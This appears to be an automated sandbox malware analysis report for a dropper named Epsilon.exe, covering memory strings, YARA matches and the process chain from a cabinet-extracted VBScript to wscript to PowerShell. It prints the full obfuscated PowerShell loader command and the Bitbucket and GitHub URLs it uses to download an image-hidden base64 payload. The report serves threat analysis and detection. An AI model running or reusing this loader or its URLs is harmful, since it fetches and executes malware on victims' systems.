fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000005.00000002.2430048549.0000027B39EBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://admin.atlassian.com
        Source: powershell.exe, 00000005.00000002.2430048549.0000027B39E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430048549.0000027B39E57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.bitbucket.org
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atlassianblog.wpengine.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=d
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/c9b3998323c0/dist/webpack
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/c9b3998323c0/jsi18n/en/dj
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/gateway/api/emoji/
        Source: powershell.exe, 00000005.00000002.2430048549.0000027B3A3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2466653987.0000027B523E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA390000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170048890.000001A1DA670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168503153.000001A1DA419000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA3B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170230937.000001A1DA684000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.status.atlassian.com/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/login
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/logout
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://id.atlassian.com/manage-profile/
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://preferences.atlassian.com
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
        Source: powershell.exe, 00000005.00000002.2430048549.0000027B3A3E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2466653987.0000027B523E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA390000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170048890.000001A1DA670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168503153.000001A1DA419000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2168306779.000001A1DA3B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2170230937.000001A1DA684000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49705 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: Process Memory Space: powershell.exe PID: 7504, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Wscript starts Powershell (via cmd or directly)
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$DJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737822C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF737822C54
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737821C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF737821C0C
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737822DB40_2_00007FF737822DB4
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737826CA40_2_00007FF737826CA4
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF7378266C40_2_00007FF7378266C4
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF7378240C40_2_00007FF7378240C4
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737821D280_2_00007FF737821D28
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737825D900_2_00007FF737825D90
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737821C0C0_2_00007FF737821C0C
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF7378235300_2_00007FF737823530
        Source: Epsilon.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 6568 bytes, 1 file, at 0x2c +A "677174b841ee7.vbs", ID 1209, number 1, 1 datablock, 0x1503 compression
        Source: Epsilon.exeStatic PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
        Source: Epsilon.exeBinary or memory string: OriginalFilename vs Epsilon.exe
        Source: Epsilon.exe, 00000000.00000002.2021563395.00007FF73782E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Epsilon.exe
        Source: Epsilon.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Epsilon.exe
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5356
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2010
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5356Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2010Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 7504, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.spre.expl.evad.winEXE@12/8@2/2
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737826CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF737826CA4
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737821C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF737821C0C
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737826CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00007FF737826CA4
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737822DB4 memset,memset,CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17,0_2_00007FF737822DB4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
        Source: C:\Users\user\Desktop\Epsilon.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 677174b841ee7.vbs
        Source: Epsilon.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Epsilon.exeReversingLabs: Detection: 36%
        Source: unknownProcess created: C:\Users\user\Desktop\Epsilon.exe "C:\Users\user\Desktop\Epsilon.exe"
        Source: C:\Users\user\Desktop\Epsilon.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 677174b841ee7.vbs
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs"
